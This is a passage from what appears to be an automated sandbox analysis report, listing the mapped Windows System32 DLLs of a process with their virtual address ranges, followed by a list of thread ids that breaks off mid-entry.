"ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2691 start_va = 0x7ffb15cc0000 end_va = 0x7ffb15deafff entry_point = 0x7ffb15cc0000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2692 start_va = 0x7ffb15df0000 end_va = 0x7ffb15eb3fff entry_point = 0x7ffb15df0000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 2693 start_va = 0x7ffb15ec0000 end_va = 0x7ffb15ec7fff entry_point = 0x7ffb15ec0000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2694 start_va = 0x7ffb15ed0000 end_va = 0x7ffb15ef9fff entry_point = 0x7ffb15ed0000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2695 start_va = 0x7ffb15f00000 end_va = 0x7ffb15f0dfff entry_point = 0x7ffb15f00000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2696 start_va = 0x7ffb15f10000 end_va = 0x7ffb15f5cfff entry_point = 0x7ffb15f10000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2697 start_va = 0x7ffb15f60000 end_va = 0x7ffb15ffcfff entry_point = 0x7ffb15f60000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2698 start_va = 0x7ffb16000000 end_va = 0x7ffb16018fff entry_point = 0x7ffb16000000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2699 start_va = 0x7ffb16020000 end_va = 0x7ffb16033fff entry_point = 0x7ffb16020000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2700 start_va = 0x7ffb16050000 end_va = 0x7ffb160b6fff entry_point = 0x7ffb16050000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2701 start_va = 0x7ffb16160000 end_va = 0x7ffb1616dfff entry_point = 0x7ffb16160000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2702 start_va = 0x7ffb162f0000 end_va = 0x7ffb165a0fff entry_point = 0x7ffb162f0000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 2703 start_va = 0x7ffb165b0000 end_va = 0x7ffb16630fff entry_point = 0x7ffb165b0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2704 start_va = 0x7ffb16720000 end_va = 0x7ffb1672afff entry_point = 0x7ffb16720000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2705 start_va = 0x7ffb16730000 end_va = 0x7ffb16749fff entry_point = 0x7ffb16730000 region_type = mapped_file name = "bcd.dll" filename = "\\Windows\\System32\\bcd.dll" (normalized: "c:\\windows\\system32\\bcd.dll") Region: id = 2706 start_va = 0x7ffb16750000 end_va = 0x7ffb16759fff entry_point = 0x7ffb16750000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2707 start_va = 0x7ffb16760000 end_va = 0x7ffb16788fff entry_point = 0x7ffb16760000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2708 start_va = 0x7ffb16790000 end_va = 0x7ffb16843fff entry_point = 0x7ffb16790000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2709 start_va = 0x7ffb16b10000 end_va = 0x7ffb16b26fff entry_point = 0x7ffb16b10000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2710 start_va = 0x7ffb16b30000 end_va = 0x7ffb16b53fff entry_point = 0x7ffb16b30000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 2711 start_va = 0x7ffb16ba0000 end_va = 0x7ffb16bbdfff entry_point = 0x7ffb16ba0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2712 start_va = 0x7ffb16bc0000 end_va = 0x7ffb16beffff entry_point = 0x7ffb16bc0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2713 start_va = 0x7ffb16ce0000 end_va = 0x7ffb16d05fff entry_point = 0x7ffb16ce0000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 2714 start_va = 0x7ffb16ea0000 end_va = 0x7ffb16eb6fff entry_point = 0x7ffb16ea0000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2715 start_va = 0x7ffb16ec0000 end_va = 0x7ffb1705cfff entry_point = 0x7ffb16ec0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2716 start_va = 0x7ffb17060000 end_va = 0x7ffb170d7fff entry_point = 0x7ffb17060000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2717 start_va = 0x7ffb170e0000 end_va = 0x7ffb170f5fff entry_point = 0x7ffb170e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2718 start_va = 0x7ffb17100000 end_va = 0x7ffb1711afff entry_point = 0x7ffb17100000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2719 start_va = 0x7ffb17120000 end_va = 0x7ffb17134fff entry_point = 0x7ffb17120000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2720 start_va = 0x7ffb17140000 end_va = 0x7ffb17167fff entry_point = 0x7ffb17140000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2721 start_va = 0x7ffb17170000 end_va = 0x7ffb17193fff entry_point = 0x7ffb17170000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 2722 start_va = 0x7ffb171a0000 end_va = 0x7ffb171a8fff entry_point = 0x7ffb171a0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2723 start_va = 0x7ffb171b0000 end_va = 0x7ffb171c0fff entry_point = 0x7ffb171b0000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2724 start_va = 0x7ffb171d0000 end_va = 0x7ffb171e8fff entry_point = 0x7ffb171d0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2725 start_va = 0x7ffb171f0000 end_va = 0x7ffb17229fff entry_point = 0x7ffb171f0000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2726 start_va = 0x7ffb17230000 end_va = 0x7ffb17376fff entry_point = 0x7ffb17230000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2727 start_va = 0x7ffb17380000 end_va = 0x7ffb173affff entry_point = 0x7ffb17380000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2728 start_va = 0x7ffb173b0000 end_va = 0x7ffb173e7fff entry_point = 0x7ffb173b0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2729 start_va = 0x7ffb17860000 end_va = 0x7ffb178c6fff entry_point = 0x7ffb17860000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2730 start_va = 0x7ffb17b40000 end_va = 0x7ffb17b50fff entry_point = 0x7ffb17b40000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2731 start_va = 0x7ffb17b60000 end_va = 0x7ffb17b6afff entry_point = 0x7ffb17b60000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2732 start_va = 0x7ffb17d30000 end_va = 0x7ffb17e94fff entry_point = 0x7ffb17d30000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2733 start_va = 0x7ffb17ea0000 end_va = 0x7ffb17eadfff entry_point = 0x7ffb17ea0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2734 start_va = 0x7ffb186c0000 end_va = 0x7ffb187a2fff entry_point = 0x7ffb186c0000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2735 start_va = 0x7ffb18800000 end_va = 0x7ffb1882bfff entry_point = 0x7ffb18800000 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2736 start_va = 0x7ffb18920000 end_va = 0x7ffb1892afff entry_point = 0x7ffb18920000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2737 start_va = 0x7ffb18930000 end_va = 0x7ffb18938fff entry_point = 0x7ffb18930000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2738 start_va = 0x7ffb18ba0000 end_va = 0x7ffb18bfafff entry_point = 0x7ffb18ba0000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2739 start_va = 0x7ffb18c00000 end_va = 0x7ffb18c1ffff entry_point = 0x7ffb18c00000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2740 start_va = 0x7ffb18c20000 end_va = 0x7ffb18c71fff entry_point = 0x7ffb18c20000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2741 start_va = 0x7ffb18c80000 end_va = 0x7ffb18c87fff entry_point = 0x7ffb18c80000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 2742 start_va = 0x7ffb18c90000 end_va = 0x7ffb18c9dfff entry_point = 0x7ffb18c90000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2743 start_va = 0x7ffb18ca0000 end_va = 0x7ffb18cb5fff entry_point = 0x7ffb18ca0000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 2744 start_va = 0x7ffb18cc0000 end_va = 0x7ffb18cdffff entry_point = 0x7ffb18cc0000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 2745 start_va = 0x7ffb18ce0000 end_va = 0x7ffb18cf1fff entry_point = 0x7ffb18ce0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2746 start_va = 0x7ffb18d60000 end_va = 0x7ffb18d81fff entry_point = 0x7ffb18d60000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2747 start_va = 0x7ffb18d90000 end_va = 0x7ffb18dbafff entry_point = 0x7ffb18d90000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2748 start_va = 0x7ffb19180000 end_va = 0x7ffb19207fff entry_point = 0x7ffb19180000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2749 start_va = 0x7ffb193e0000 end_va = 0x7ffb1947efff entry_point = 0x7ffb193e0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2750 start_va = 0x7ffb19740000 end_va = 0x7ffb19748fff entry_point = 0x7ffb19740000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2751 start_va = 0x7ffb198d0000 end_va = 0x7ffb198f5fff entry_point = 0x7ffb198d0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2752 start_va = 0x7ffb19920000 end_va = 0x7ffb19929fff entry_point = 0x7ffb19920000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2753 start_va = 0x7ffb19930000 end_va = 0x7ffb19938fff entry_point = 0x7ffb19930000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 2754 start_va = 0x7ffb19940000 end_va = 0x7ffb1994afff entry_point = 0x7ffb19940000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2755 start_va = 0x7ffb19a90000 end_va = 0x7ffb19b45fff entry_point = 0x7ffb19a90000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2756 start_va = 0x7ffb19c50000 end_va = 0x7ffb19c72fff entry_point = 0x7ffb19c50000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2757 start_va = 0x7ffb19c80000 end_va = 0x7ffb19c8cfff entry_point = 0x7ffb19c80000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2758 start_va = 0x7ffb19c90000 end_va = 0x7ffb19c9dfff entry_point = 0x7ffb19c90000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 2759 start_va = 0x7ffb19d00000 end_va = 0x7ffb19d0bfff entry_point = 0x7ffb19d00000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2760 start_va = 0x7ffb19d10000 end_va = 0x7ffb19d57fff entry_point = 0x7ffb19d10000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2761 start_va = 0x7ffb19f50000 end_va = 0x7ffb19f84fff entry_point = 0x7ffb19f50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2762 start_va = 0x7ffb1a060000 end_va = 0x7ffb1a07efff entry_point = 0x7ffb1a060000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2763 start_va = 0x7ffb1a080000 end_va = 0x7ffb1a0bcfff entry_point = 0x7ffb1a080000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2764 start_va = 0x7ffb1a0c0000 end_va = 0x7ffb1a162fff entry_point = 0x7ffb1a0c0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2765 start_va = 0x7ffb1a2b0000 end_va = 0x7ffb1a307fff entry_point = 0x7ffb1a2b0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2766 start_va = 0x7ffb1a310000 end_va = 0x7ffb1a32dfff entry_point = 0x7ffb1a310000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2767 start_va = 0x7ffb1a420000 end_va = 0x7ffb1a437fff entry_point = 0x7ffb1a420000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 2768 start_va = 0x7ffb1a470000 end_va = 0x7ffb1a4bffff entry_point = 0x7ffb1a470000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2769 start_va = 0x7ffb1a540000 end_va = 0x7ffb1a565fff entry_point = 0x7ffb1a540000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2770 start_va = 0x7ffb1a7d0000 end_va = 0x7ffb1a7f4fff entry_point = 0x7ffb1a7d0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2771 start_va = 0x7ffb1a800000 end_va = 0x7ffb1a80afff entry_point = 0x7ffb1a800000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2772 start_va = 0x7ffb1a810000 end_va = 0x7ffb1a817fff entry_point = 0x7ffb1a810000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2773 start_va = 0x7ffb1a830000 end_va = 0x7ffb1a85afff entry_point = 0x7ffb1a830000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2774 start_va = 0x7ffb1a860000 end_va = 0x7ffb1a8bffff entry_point = 0x7ffb1a860000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2775 start_va = 0x7ffb1a8c0000 end_va = 0x7ffb1a956fff entry_point = 0x7ffb1a8c0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2776 start_va = 0x7ffb1a960000 end_va = 0x7ffb1a9b6fff entry_point = 0x7ffb1a960000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2777 start_va = 0x7ffb1a9c0000 end_va = 0x7ffb1a9c9fff entry_point = 0x7ffb1a9c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2778 start_va = 0x7ffb1a9f0000 end_va = 0x7ffb1aa34fff entry_point = 0x7ffb1a9f0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2779 start_va = 0x7ffb1aa50000 end_va = 0x7ffb1aa63fff entry_point = 0x7ffb1aa50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2780 start_va = 0x7ffb1ab00000 end_va = 0x7ffb1ab11fff entry_point = 0x7ffb1ab00000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2781 start_va = 0x7ffb1ab20000 end_va = 0x7ffb1acf6fff entry_point = 0x7ffb1ab20000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2782 start_va = 0x7ffb1ad00000 end_va = 0x7ffb1ad4bfff entry_point = 0x7ffb1ad00000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2783 start_va = 0x7ffb1ad50000 end_va = 0x7ffb1ad99fff entry_point = 0x7ffb1ad50000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2784 start_va = 0x7ffb1ada0000 end_va = 0x7ffb1aeaffff entry_point = 0x7ffb1ada0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2785 start_va = 0x7ffb1af60000 end_va = 0x7ffb1b006fff entry_point = 0x7ffb1af60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2786 start_va = 0x7ffb1b010000 end_va = 0x7ffb1b067fff entry_point = 0x7ffb1b010000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2787 start_va = 0x7ffb1b070000 end_va = 0x7ffb1b126fff entry_point = 0x7ffb1b070000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2788 start_va = 0x7ffb1b140000 end_va = 0x7ffb1b279fff entry_point = 0x7ffb1b140000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2789 start_va = 0x7ffb1b280000 end_va = 0x7ffb1b288fff entry_point = 0x7ffb1b280000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2790 start_va = 0x7ffb1b290000 end_va = 0x7ffb1b407fff entry_point = 0x7ffb1b290000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2791 start_va = 0x7ffb1b410000 end_va = 0x7ffb1b580fff entry_point = 0x7ffb1b410000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2792 start_va = 0x7ffb1b870000 end_va = 0x7ffb1ba45fff entry_point = 0x7ffb1b870000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2793 start_va = 0x7ffb1ba50000 end_va = 0x7ffb1baa6fff entry_point = 0x7ffb1ba50000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2794 start_va = 0x7ffb1bac0000 end_va = 0x7ffb1ced6fff entry_point = 0x7ffb1bac0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2795 start_va = 0x7ffb1cef0000 end_va = 0x7ffb1cf94fff entry_point = 0x7ffb1cef0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2796 start_va = 0x7ffb1cfa0000 end_va = 0x7ffb1d043fff entry_point = 0x7ffb1cfa0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2797 start_va = 0x7ffb1d050000 end_va = 0x7ffb1d223fff entry_point = 0x7ffb1d050000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2798 start_va = 0x7ffb1d230000 end_va = 0x7ffb1d280fff entry_point = 0x7ffb1d230000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2799 start_va = 0x7ffb1d290000 end_va = 0x7ffb1d2e9fff entry_point = 0x7ffb1d290000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2800 start_va = 0x7ffb1d450000 end_va = 0x7ffb1d594fff entry_point = 0x7ffb1d450000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2801 start_va = 0x7ffb1d5a0000 end_va = 0x7ffb1d6d5fff entry_point = 0x7ffb1d5a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2802 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 100 os_tid = 0x440 Thread: id = 101 os_tid = 0x87c Thread: id = 102 os_tid = 0x4b0 Thread: id = 103 os_tid = 0x488 Thread: id = 104 os_tid = 0x828 Thread: id = 105 os_tid = 0x5c0 Thread: id = 106 os_tid = 0x818 Thread: id = 107 os_tid = 0x344 Thread: id = 108 os_tid = 0x388 Thread: id = 109 os_tid = 0x294 Thread: id = 110 os_tid = 0x250 Thread: id = 111 os_tid = 0x2ec Thread: id = 112 os_tid = 0x914 Thread: id = 113 os_tid = 0x640 Thread: id = 114 os_tid = 0x428 Thread: id = 115 os_tid = 0x394 Thread: id = 116 os_tid = 0x2b0 Thread: id = 117 os_tid = 0x2d8 Thread: id = 118 os_tid = 0x2e4 Thread: id = 119 os_tid = 0x3dc Thread: id = 120 os_tid = 0x688 Thread: id = 121 os_tid = 0x658 Thread: id = 122 os_tid = 0x61c Thread: id = 123 os_tid = 0x5b8 Thread: id = 124 os_tid = 0x508 Thread: id = 125 os_tid = 0x7f0 Thread: id = 126 os_tid = 0x7e4 Thread: id = 127 os_tid = 